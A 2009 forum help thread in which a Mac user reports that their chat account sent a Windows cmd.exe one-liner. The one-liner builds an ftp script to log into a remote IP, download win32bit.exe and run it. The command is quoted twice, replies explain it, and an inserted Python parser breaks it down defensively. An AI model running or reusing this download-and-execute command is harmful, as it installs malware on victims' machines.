spaceboots06 (Original poster), Jun 13, 2009
Hello everyone!

I was using iChat today, left my computer on, did a few activities outside, came back and saw this in my chatbox.

%systemroot%\system32\cmd.exe

del eq&echo open 190.209.231.41 26031 >> eq&echo user 29370 28075 >> eq &echo get win32bit.exe >> eq &echo quit >> eq &ftp -n -s:eq &win32bit.exe &del eq

j

These three messages were sent by me! To my friend! I don't even know what they mean. I know they have something to do with windows machines, and I know that del means delete, so I'm still trying to figure out what's going on. Something with the command line I assume.

Anyway, could this be something to do with zombie machines or whatever? I have no idea what is going on. I would have put this in Mac help, but it seems as if this could also be a Windows problem too. No idea.

Help!

Thanks.

Edit: Oh, yeah. Now Software Update wants me to update iTunes, QuickTime, Java and Security Update 2009-005. Should I do it?
 
That is not Mac (darwin) command line, that is Windows command line.
How it happened, I don't know.

Yes, update everything in Software Updater.
 
Do you use VNC or any remote desktop utility?

I have Jaadu VNC for my iPhone, allowing me to view my screen and control my screen from my iPhone, but it wasn't enabled. I also use a password on the screen sharing setting on my computer! I'm in a techy university right now, so could someone have cracked the password or something and used my computer? Wouldn't they have tried to do more damage than they already attempted to do? Should I reformat my computer? I'm pretty bugged out right now.
 
Definitely weird. May have been a hijack attempt. Obviously you aren't going to have a system32 folder since you are on a Mac.

It looks like it's trying to install win32bit.exe into your system32 folder, which is normally the location most viruses etc. locate themselves.
 
Definitely!!! ALWAYS stay on top of patches, since they usually contain critical security fixes.

It looks like you may have hit malware somewhere. Fortunately, it's a Windows-based malware so it had no effect on your Mac. It appears to connect to a server in Chile to download an actual Windows executable that then probably takes over a victim Windows PC. I don't think it actually ran in your case.

Of more concern to me was that it found a way to get onto your Mac. I suspect you may have possibly browsed somewhere that delivered hidden malware. Happened to NYtimes.com users last weekend (for example).

So best defense is to apply all updates, reboot, and make sure your antivirus definitions are up to date, too.
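An added example, not part of any poster's reply: a small Python parser that rebuilds the ftp script the one-liner in the first post assembles with `echo`, and reports the server, login and download-then-run step, the kind of check a defender could run over logged command lines. The function name `analyze` and the report fields are illustrative assumptions.

```python
import re

# Command line exactly as quoted in the first post of this thread.
SAMPLE = (
    "del eq&echo open 190.209.231.41 26031 >> eq&echo user 29370 28075 >> eq "
    "&echo get win32bit.exe >> eq &echo quit >> eq &ftp -n -s:eq &win32bit.exe &del eq")
ECHO_RE = re.compile(r"^echo\s+(.*?)\s*>>?\s*(\S+)$", re.I)   # echo TEXT >> FILE
FTP_RE = re.compile(r"^ftp(?:\.exe)?\b.*?\s-s:(\S+)", re.I)   # ftp ... -s:SCRIPT

def analyze(cmdline):
    """Rebuild an echo-built ftp script from a cmd.exe one-liner; flag download-and-run."""
    scripts = {}  # script file name -> lines echoed into it
    report = {"script": None, "host": None, "port": None, "user": None,
              "fetched": [], "executed": [], "cleanup": False}
    for part in (p.strip() for p in cmdline.split("&")):
        if not part:
            continue
        m = ECHO_RE.match(part)
        if m:
            scripts.setdefault(m.group(2).lower(), []).append(m.group(1))
            continue
        m = FTP_RE.match(part)
        if m:
            report["script"] = m.group(1).lower()
            for line in scripts.get(report["script"], []):
                words = line.split()
                verb = words[0].lower() if words else ""
                if verb == "open" and len(words) >= 2:
                    report["host"] = words[1]
                    report["port"] = int(words[2]) if len(words) > 2 else 21
                elif verb == "user" and len(words) >= 2:
                    report["user"] = words[1]
                elif verb in ("get", "recv", "mget") and len(words) >= 2:
                    report["fetched"].append(words[-1].lower())
            continue
        words = part.split()
        if words[0].lower() in ("del", "erase"):
            # Deleting the script after ftp has read it removes the staging file.
            if report["script"] and report["script"] in (w.lower() for w in words[1:]):
                report["cleanup"] = True
        elif words[0].lower() in report["fetched"]:
            report["executed"].append(words[0].lower())
    report["download_and_run"] = bool(report["executed"])
    return report
```

Calling `analyze(SAMPLE)` returns the reconstructed server, port, login name and fetched file, with `download_and_run` set when a fetched file is launched in the same command chain.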
 
Alright, cool. No immediate damage done, seeing that the messages that were sent came from and went to Mac machines.

My question is though, where could this have come from? Did I download a bad program? Is my Screen Sharing thingy vulnerable? Any ideas? I'm about to disable Screen Sharing right now.

Of more concern to me was that it found a way to get onto your Mac. I suspect you may have possibly browsed somewhere that delivered hidden malware. Happened to NYtimes.com users last weekend (for example).

Yeah! That's what's freaking me out!!! This dumb chick told me to download this file sharing program called Shakes Peer and I listened. I think that's what the problem is, even though I only used it for about five minutes. Either that, or Screen Sharing.

I'm still very surprised that this was the only thing that happened, and that I'm not missing any files or there are no little prank things that the typical hacker person would do.
 
Hello everyone!

I was using iChat today, left my computer on, did a few activities outside, came back and saw this in my chatbox.

%systemroot%\system32\cmd.exe

del eq&echo open 190.209.231.41 26031 >> eq&echo user 29370 28075 >> eq &echo get win32bit.exe >> eq &echo quit >> eq &ftp -n -s:eq &win32bit.exe &del eq

Please tell me your chat response was something like:
ha ha ha ha ha
 
Please tell me your chat response was something like:

Hahahahaha, sadly, no.

Are you sure it was coming from YOUR end? not something the other side accidentally pasted in the screen?

It was coming from my end. I asked "WTF?" when I came back to the computer and the person said that they ignored the "gibberish." They thought nothing of it.
 